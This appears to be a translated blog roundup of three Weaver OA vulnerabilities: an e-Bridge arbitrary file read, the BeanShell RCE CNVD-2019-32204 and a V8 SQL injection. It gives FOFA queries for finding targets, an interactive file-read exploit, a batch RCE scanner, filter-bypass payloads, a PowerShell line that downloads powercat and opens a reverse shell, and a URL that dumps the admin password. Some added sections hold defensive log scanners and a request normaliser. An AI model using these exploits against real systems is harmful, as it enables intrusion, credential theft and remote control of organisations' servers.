Weaver OA (泛微OA) Vulnerabilities (Roundup)
I spotted the little hacker picture in an article by 月球师傅 on F12sec.
It looked nice, so I used it as the cover.
[李淳罡:] Lend me your 🗡 for a moment (I won't tell you I've just come from 东海武帝城 😏)
Contents
1. Weaver e-Bridge arbitrary file read
1.1 Vulnerability description
1.3 Affected versions
1.2 FOFA
1.4 Reproduction
1.5 PoC script
2. Weaver OA Bsh remote code execution vulnerability (CNVD-2019-32204)
2.1 Vulnerability description
2.2 FOFA
2.3 Affected versions
2.4 Reproduction
2.5 Batch PoC script
3. Weaver OA V8 SQL injection vulnerability
3.1 Vulnerability description
3.2 FOFA
3.3 Affected versions
3.4 Reproduction
3.5 Exploit script
1. Weaver e-Bridge arbitrary file read
1.1 Vulnerability description
Weaver e-Bridge (泛微云桥) is a system-integration middleware developed by Shanghai Weaver in the "Internet Plus" context to bridge open internet resources with enterprise information systems. e-Bridge has an arbitrary file read vulnerability; an attacker who exploits it can read arbitrary files and obtain sensitive information.
1.3 Affected versions
Multiple e-Bridge releases from 2018-2019
1.2 FOFA
title="泛微云桥e-Bridge"
1.4 Reproduction
1.4.1 Windows
Request the path
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/windows/win.ini&fileExt=txt
If an id value is returned, the target is vulnerable.
Then call the file-view interface with that id
/file/fileNoLogin/<id>
1.4.2 Linux
Request the path
http://xxx.xxx.xxx.xxx/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
If an id value is returned, the target is vulnerable.
Then call the file-view interface with that id
http://xxx.xxx.xxx.xxx/file/fileNoLogin/<id>
1.5 PoC script
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from   : http://wiki.peiqi.tech
import requests
import re
import sys

def title():
    print('+------------------------------------------')
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                  \033[0m')
    print('+  \033[34mGithub : https://github.com/PeiQi0               \033[0m')
    print('+  \033[34m公众号 : PeiQi文库                                \033[0m')
    print('+  \033[34mVersion: 泛微云桥 e-Bridge                        \033[0m')
    print('+  \033[36m使用格式:  python3 poc.py                         \033[0m')
    print('+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx           \033[0m')
    print('+------------------------------------------')

# Detect the target OS and check whether the vulnerability is exploitable
def POC_1(target_url):
    vuln_url_1 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt"
    vuln_url_2 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
    vuln_url_3 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///&fileExt=txt"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        response_1 = requests.get(url=vuln_url_1, headers=headers, verify=False, timeout=10)
        response_2 = requests.get(url=vuln_url_2, headers=headers, verify=False, timeout=10)
        response_3 = requests.get(url=vuln_url_3, headers=headers, verify=False, timeout=10)
        # A patched instance answers both probes with an authentication error
        if "无法验证您的身份" in response_1.text and "无法验证您的身份" in response_2.text:
            print("\033[31m[x] 漏洞已修复,不存在漏洞 \033[0m")
            sys.exit(0)
        else:
            # Linux: the C:/ probe fails with a POSIX error message
            if "No such file or directory" in response_1.text:
                print("\033[32m[o] 目标为 Linux 系统\033[0m")
                id = re.findall(r'"id":"(.*?)"', response_3.text)[0]
                print("\033[32m[o] 成功获取id:{}\033[0m".format(id))
                return id, "linux"
            # Windows: the /etc/passwd probe fails with a Windows error message
            elif "系统找不到指定的路径" in response_2.text:
                print("\033[32m[o] 目标为 Windows 系统\033[0m")
                id = re.findall(r'"id":"(.*?)"', response_1.text)[0]
                print("\033[32m[o] 成功获取id:{}\033[0m".format(id))
                return id, "windows"
            else:
                print("\033[31m[x] 无法获取目标系统\033[0m")
                sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败:{} \033[0m".format(e))
        sys.exit(0)

# Verify the vulnerability: fetch the stored file by id
def POC_2(target_url, id):
    file_url = target_url + "/file/fileNoLogin/{}".format(id)
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
        response.encoding = 'GBK'
        print("\033[32m[o] 成功读取:\n\033[0m{}".format(response.text))
    except Exception as e:
        print("\033[31m[x] 请求失败:{} \033[0m".format(e))
        sys.exit(0)

# Windows file read (path is relative to C:/)
def POC_3(target_url, File):
    file_url = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/{}&fileExt=txt".format(File)
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
        id = re.findall(r'"id":"(.*?)"', response.text)[0]
        print("\033[32m[o] 成功获取id:{}\033[0m".format(id))
        POC_2(target_url, id)
    except Exception:
        print("\033[31m[x] 请求失败,无法读取文件 \033[0m")

# Linux file read (absolute path)
def POC_4(target_url, File):
    file_url = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file://{}&fileExt=txt".format(File)
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
        id = re.findall(r'"id":"(.*?)"', response.text)[0]
        print("\033[32m[o] 成功获取id:{}\033[0m".format(id))
        POC_2(target_url, id)
    except Exception:
        print("\033[31m[x] 请求失败,无法读取文件 \033[0m")

if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl   >>> \033[0m"))
    id, system = POC_1(target_url)
    POC_2(target_url, id)
    # Interactive loop: type a file path, or "exit" to quit
    while True:
        if system == "windows":
            File = input("\033[35mFile >>> \033[0m")
            if File == "exit":
                sys.exit(0)
            else:
                POC_3(target_url, File)
        if system == "linux":
            File = input("\033[35mFile >>> \033[0m")
            if File == "exit":
                sys.exit(0)
            else:
                POC_4(target_url, File)
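The e-Bridge bug above comes down to a download-URL parameter that the server fetches with whatever scheme it is given, so `file:///etc/passwd` is read and later served back through `/file/fileNoLogin/<id>`. The following Python is an added example (my code, not the page's or Weaver's): a scheme-and-host allowlist that a fetch-by-URL feature should apply before touching the network or disk, and a detector for access-log lines whose `downloadUrl` parameter on `/wxjsapi/saveYZJFile` carries a non-http(s) scheme. The function names, the host allowlist and the log lines are constructed for the example.

```python
import ipaddress
import re
from urllib.parse import urlsplit, parse_qs, unquote

ALLOWED_SCHEMES = {"http", "https"}


def validate_download_url(url, allowed_hosts):
    """Allowlist check for a fetch-by-URL parameter. Returns (ok, reason).

    Only http(s) to a named, allowlisted host passes; file:// (the bug above),
    other schemes, IP literals and embedded credentials are refused.
    Hypothetical helper, not the product's API."""
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % (scheme or "(none)")
    host = (parts.hostname or "").lower()
    if not host:
        return False, "missing host"
    try:
        ipaddress.ip_address(host)          # raw IPs never pass: names only
        return False, "IP literals not allowed"
    except ValueError:
        pass
    if host not in allowed_hosts:
        return False, "host %r not in allowlist" % host
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    return True, "ok"


# Common Log Format; the request line is "METHOD PATH PROTO".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def scan_access_log(lines):
    """Flag saveYZJFile requests whose downloadUrl uses a non-http(s) scheme.

    parse_qs decodes once and unquote decodes again, so a double-encoded
    file%253A... value is caught as well."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "/wxjsapi/saveYZJFile" not in m.group("path"):
            continue
        query = urlsplit(m.group("path")).query
        for raw in parse_qs(query).get("downloadUrl", []):
            scheme = urlsplit(unquote(raw)).scheme.lower()
            if scheme not in ALLOWED_SCHEMES:
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "scheme": scheme or "(none)", "downloadUrl": raw})
    return hits


SAMPLE_LOG = [  # constructed lines, not from a real system
    '203.0.113.7 - - [10/Oct/2020:13:55:36 +0800] "GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1" 200 48',
    '203.0.113.7 - - [10/Oct/2020:13:55:40 +0800] "GET /file/fileNoLogin/1234 HTTP/1.1" 200 1520',
    '198.51.100.2 - - [10/Oct/2020:14:01:02 +0800] "GET /wxjsapi/saveYZJFile?fileName=a&downloadUrl=https%3A%2F%2Ffiles.example.com%2Fa.txt&fileExt=txt HTTP/1.1" 200 48',
    '203.0.113.7 - - [10/Oct/2020:14:02:11 +0800] "GET /wxjsapi/saveYZJFile?fileName=t&downloadUrl=file%253A%252F%252F%252FC%3A%252Fwindows%252Fwin.ini&fileExt=txt HTTP/1.1" 200 48',
]

if __name__ == "__main__":
    print(validate_download_url("file:///etc/passwd", {"files.example.com"}))
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

A hit on the first or fourth line followed within seconds by a `/file/fileNoLogin/<id>` fetch from the same address is the full read-then-retrieve sequence the reproduction steps describe, which is worth correlating in a SIEM rather than alerting on the two requests separately.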
2. Weaver OA Bsh remote code execution vulnerability (CNVD-2019-32204)
2.1 Vulnerability description
On 17 September 2019 Weaver released a patch for a remote code execution vulnerability: the Java BeanShell interface of the e-cology OA system could be accessed without authorization. By calling this BeanShell interface, an attacker can craft HTTP requests that bypass some of Weaver's own safety restrictions and achieve remote command execution. Severity: critical.
2.2 FOFA
app="泛微-协同办公OA"
2.3 Affected versions
E-cology 7.0, E-cology 8.0, E-cology 8.1, E-cology 9.0
2.4 Reproduction
Append the component's access path to the site root
/weaver/bsh.servlet.BshServlet/
then execute a command
exec("whoami")
PoC request
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: xxxxxxxx:8088
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
bsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
?關(guān)于繞過
eval%00("ex"%2b"ec(\"whoami\")");
ex\u0065c("cmd /c dir");
IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd
2.5 Batch PoC script
Source: Vulnerability-analysis/0917/weaver-oa/CNVD-2019-32204 at master · myzing00/Vulnerability-analysis · GitHub
#!/usr/bin/python
#coding:utf-8
#Author:Ja0k
#For Weaver-Ecology-OA_RCE
# Python 2 script: the "except Exception,Error" syntax and the str-based
# substring checks on http_response.content are Python 2 only.
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import requests,sys

headers = {
    'Content-Type': 'text/xml; charset=utf-8',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
    'Cache-Control': 'max-age=0',
    'Content-Type': 'application/x-www-form-urlencoded',   # duplicate key: this later value wins
    'Upgrade-Insecure-Requests': '1',
    'Content-Length': '578'
}
proxies= {'http':'http://127.0.0.1:8080'}

def Poc_check(target):
    # The servlet may be mounted under several context paths
    Url_Payload1="/bsh.servlet.BshServlet"
    Url_Payload2="/weaver/bsh.servlet.BshServlet"
    Url_Payload3="/weaveroa/bsh.servlet.BshServlet"
    Url_Payload4="/oa/bsh.servlet.BshServlet"
    # Plain, unicode-escaped and eval/concatenation variants of the same call
    Data_Payload1="""bsh.script=exec("whoami");&bsh.servlet.output=raw"""
    Data_Payload2= """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw"""
    Data_Payload3= """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami"""
    for Url_Payload in (Url_Payload1,Url_Payload2,Url_Payload3,Url_Payload4):
        url= target + Url_Payload
        for Data_payload in (Data_Payload1,Data_Payload2,Data_Payload3):
            try:
                http_response = requests.post(url,data=Data_payload,headers=headers,verify=False)
                #print http_response.status_code
                if http_response.status_code == 200:
                    if ";</script>" not in (http_response.content):
                        if "Login.jsp" not in (http_response.content):
                            if "Error" not in (http_response.content):
                                print("{0} is a E-cologyOA_RCE Vulnerability".format(url))
                                print("Server Current Username:{0}".format(http_response.content))
                elif http_response.status_code == 500:
                    print("{0}500 maybe is Weaver-EcologyOA,Please confirm by yourself ".format(url))
                else:
                    pass
            except Exception,Error:
                pass

if __name__ == '__main__':
    # One target URL per line in the file given as the first argument
    for line in open(sys.argv[1]).readlines():
        target=line.strip()
        Poc_check(target)
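The bypasses listed in 2.4 (`eval%00(...)`, `"ex"%2b"ec(...)"`, `ex\u0065c(...)`) all exist to defeat a naive string match for `exec`. The following Python is an added example, not code from the page or from either script's author: a request analyser that first undoes those encodings roughly the way the BeanShell interpreter will see them (NUL removal, `\uXXXX` unescaping, joining of `"ex"+"ec"` string concatenation) and only then looks for dangerous calls. It also flags any request reaching `bsh.servlet.BshServlet` under any of the context paths the batch script probes, because per the description that interface should not be reachable unauthenticated at all. The sample requests are constructed from the payloads shown on this page.

```python
import re
from urllib.parse import parse_qs

# The servlet is probed under several prefixes (/weaver, /weaveroa, /oa, root),
# so match the class name anywhere in the path.
BSH_PATH = re.compile(r"bsh\.servlet\.BshServlet", re.IGNORECASE)
DANGEROUS = ("exec(", "eval(", "runtime.getruntime", "processbuilder")


def normalize_bsh_script(script):
    """Undo the obfuscation layers from the bypass payloads.

    `script` is already form-decoded (parse_qs output), so %00 is a NUL byte
    and %2b is a literal '+' by the time it gets here."""
    s = script.replace("\x00", "")                          # eval%00(...) -> eval(...)
    s = re.sub(r"\\u([0-9a-fA-F]{4})",
               lambda m: chr(int(m.group(1), 16)), s)       # ex\u0065c -> exec
    s = re.sub(r"""(["'])\s*\+\s*\1""", "", s)              # "ex"+"ec" -> "exec"
    return s.lower()


def analyze_bsh_request(method, path, body):
    """Findings for one HTTP request (e.g. from a WAF or proxy log that
    records POST bodies). Hypothetical helper, not a product API."""
    result = {"servlet": False, "obfuscated": False, "dangerous": []}
    if not BSH_PATH.search(path):
        return result
    result["servlet"] = True     # reaching this servlet at all is the finding
    for script in parse_qs(body, keep_blank_values=True).get("bsh.script", []):
        norm = normalize_bsh_script(script)
        if norm != script.lower():
            result["obfuscated"] = True
        result["dangerous"].extend(tok for tok in DANGEROUS if tok in norm)
    return result


SAMPLE_REQUESTS = [  # constructed from the page's payloads
    ("POST", "/weaver/bsh.servlet.BshServlet",
     'bsh.script=eval%00("ex"%2b"ec(\\"whoami\\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw'),
    ("POST", "/oa/bsh.servlet.BshServlet",
     'bsh.script=\\u0065\\u0078\\u0065\\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw'),
    ("POST", "/weaver/bsh.servlet.BshServlet",
     'bsh.script=exec("whoami");&bsh.servlet.output=raw'),
    ("GET", "/login/Login.jsp", ""),
]


def scan_requests(requests_=SAMPLE_REQUESTS):
    """Analyse every (method, path, body) tuple and return the findings."""
    return [analyze_bsh_request(*r) for r in requests_]


if __name__ == "__main__":
    for req, finding in zip(SAMPLE_REQUESTS, scan_requests()):
        print(req[1], finding)
```

Because the first check is the path alone, the rule still fires for a payload variant the normaliser does not understand; the `obfuscated` and `dangerous` fields only add severity. The durable fix is the vendor patch plus blocking the servlet path at the reverse proxy for anything that is not an authenticated administrative source.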
3. Weaver OA V8 SQL injection vulnerability
3.1 Vulnerability description
Weaver OA V8 has a SQL injection vulnerability through which an attacker can obtain administrator privileges and server access.
3.2 FOFA
app="泛微-协同办公OA"
3.3 Affected versions
Weaver OA V8
3.4 Reproduction
In getdata.jsp, the request object is handed directly to this method:
weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext)
In getData, the method checks whether the request's cmd parameter is empty and, if it is not, calls the proc method.
proc takes four parameters: (an empty string, the cmd parameter value, the request object, the ServletContext object).
In proc, the cmd value is checked; when it equals getSelectAllId, the sql and type parameters are read from the request and passed into the getSelectAllIds(sql, type) method.
Given this code flow, constructing request parameters such as
cmd=getSelectAllId&sql=select password as id from userinfo;
is enough to control the database.
PoC
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
This queries the password column of the HrmResourceManager table; the page returns the value of the first record in the database (the sysadmin user's password).
Once decrypted, it can be used to log in to the system.
3.5 Exploit script
To be compiled later.
Content compiled from 佩奇师傅 (PeiQi):
https://github.com/PeiQi0/PeiQi-WIKI-POC/tree/PeiQi/PeiQi_Wiki/OA产品漏洞/泛微OA